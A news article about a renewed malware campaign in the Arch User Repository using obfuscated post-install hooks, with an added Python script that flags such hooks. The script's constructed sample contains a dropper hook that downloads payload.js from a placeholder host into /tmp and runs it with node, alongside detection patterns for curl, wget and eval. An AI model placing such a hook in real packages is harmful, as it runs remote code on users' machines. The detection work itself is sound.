Just hours after Arch sounded the all‑clear on a massive AUR malware purge, a new, stealthier campaign is slipping malicious code back into user packages.
Yesterday morning at about 10:30 EDT I told you that AUR’s malware attack had ended, that more than 1,500 packages containing malware had been found and removed, and that the accounts of the folks who submitted the package had been deleted. If memory serves, I think I said something like, “It’s safe to go back in the water.”
Guess what? The sharks have returned. It’s time to get out of the water.
“Here we go again, now with obfuscated code,” a user with the handle a821 posted to Arch Linux’s email list at about 7:30 pm EDT yesterday, along with a list of more than 50 infected packages.
Then about 3:30 am EDT, Nicolas Boichat posted, “There’s a new wave (detected using my local Gemma E2B model FWIW). It’s a little bit more elaborate.”
Basically, this time the bad guys have added a small hidden program that runs after installation and which is purposefully written in a way to make it difficult to detect. In plain English, it tells the computer to go to the temporary folder, then silently download and install some JavaScript code from the internet.
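For readers who want to check packages before installing them, the following Python script is an added illustration (not code from this article, from Arch, or from the AUR) of a simple heuristic that flags pacman `.install` hooks showing the behaviour described above: a post-install function that changes to a temporary directory, fetches something from the network, and hands it to an interpreter. The two `.install` samples, the indicator names and the `example.invalid` URL are all constructed for the example; it is a review aid, not a substitute for reading the PKGBUILD and `.install` file yourself.

```python
"""Heuristic scan of a pacman .install file for hooks that fetch and run code.

Hypothetical helper written for this article; not an Arch or AUR tool.
"""
import re
from typing import Dict, List

# Constructed sample in the shape the article describes: a post_install hook
# that moves to a temp directory, downloads a JavaScript file and runs it.
# The URL and file name are placeholders, not real indicators.
SUSPICIOUS_INSTALL = """\
post_install() {
    cd "${TMPDIR:-/tmp}"
    curl -fsSL https://example.invalid/payload.js -o .x.js
    node .x.js
}
post_upgrade() {
    post_install
}
"""

# Constructed benign sample: prints a notice and refreshes a desktop cache.
BENIGN_INSTALL = """\
post_install() {
    echo "Run 'systemctl enable foo.service' to start foo at boot."
    update-desktop-database -q
}
"""

# The six hook names pacman recognises in an .install file.
HOOK_RE = re.compile(
    r"^(pre_install|post_install|pre_upgrade|post_upgrade|pre_remove|post_remove)"
    r"\s*\(\)\s*\{",
    re.M,
)

# Each indicator is a regex over a hook body. Network fetching from an install
# hook is the core signal; the others raise confidence that fetched content is
# staged in a temp directory, executed, or obfuscated.
INDICATORS = {
    "network_fetch": re.compile(r"\b(curl|wget)\b"),
    "temp_dir": re.compile(r"/tmp\b|\$\{?TMPDIR"),
    "interpreter_exec": re.compile(
        r"(^|\||;|&&)\s*(node|python[0-9.]*|perl|sh|bash)\s+\S", re.M
    ),
    "decode_or_eval": re.compile(r"base64\s+(-d|--decode)|\beval\b|\\x[0-9a-fA-F]{2}"),
}


def _hook_bodies(text: str) -> Dict[str, str]:
    """Map each hook name to the text between its opening brace and the next hook."""
    matches = list(HOOK_RE.finditer(text))
    bodies: Dict[str, str] = {}
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
        bodies[m.group(1)] = text[m.end():end]
    return bodies


def scan_install(text: str) -> List[Dict[str, object]]:
    """Return the hooks that look like droppers, with the indicators that fired.

    A hook is flagged when it fetches from the network and at least one other
    indicator fires. A hook that only calls an already flagged hook (the usual
    post_upgrade -> post_install indirection) inherits the verdict.
    """
    bodies = _hook_bodies(text)
    flagged: Dict[str, List[str]] = {}
    for name, body in bodies.items():
        hits = [ind for ind, rx in INDICATORS.items() if rx.search(body)]
        if "network_fetch" in hits and len(hits) >= 2:
            flagged[name] = hits
    # Second pass: propagate through direct calls to a flagged hook.
    for name, body in bodies.items():
        if name in flagged:
            continue
        for other in list(flagged):
            if other != name and re.search(r"\b%s\b" % re.escape(other), body):
                flagged[name] = ["calls_flagged_hook:" + other]
                break
    return [{"hook": n, "indicators": flagged[n]} for n in bodies if n in flagged]


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_INSTALL), ("benign", BENIGN_INSTALL)):
        print(label, scan_install(sample))
```

Run it against the `.install` file an AUR helper shows you before building; an empty result is not a clean bill of health, since anything that only touches the PKGBUILD, or that hides its fetch behind a variable or a packaged binary, will not trip these patterns.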
In other words, not only are the cracker sharks back, they’ve upped their game — or this is an entirely new shiver of more sophisticated copycat sharks.
AUR, or Arch User Repository, is a special repository that allows Arch users to make software available to other users that’s not in Arch’s official repository. As such, it’s never the safest place in the world to grab software, so even under the best of circumstances users are cautioned to be careful, or to “trust but verify.”
Since these latest waves of malware infestation started on the 12th, there’s been talk of making AUR read only until the problem is rectified, but nothing has come of that… at least, not yet. This morning, Phoronix’s Michael Larabel suggested that Arch just shut AUR down until the situation is rectified.
This is hardly Arch’s first battle with bad actors. Last August it was hit with rounds of DDOS attacks against not only the AUR repository, but also the main Arch Linux website and community forums, which caused partial outages and intermittent connectivity problems for several weeks.
Christine Hall has been a journalist since 1971. In 2001, she began writing a weekly consumer computer column and started covering Linux and FOSS in 2002 after making the switch to GNU/Linux. Follow her on Twitter: @BrideOfLinux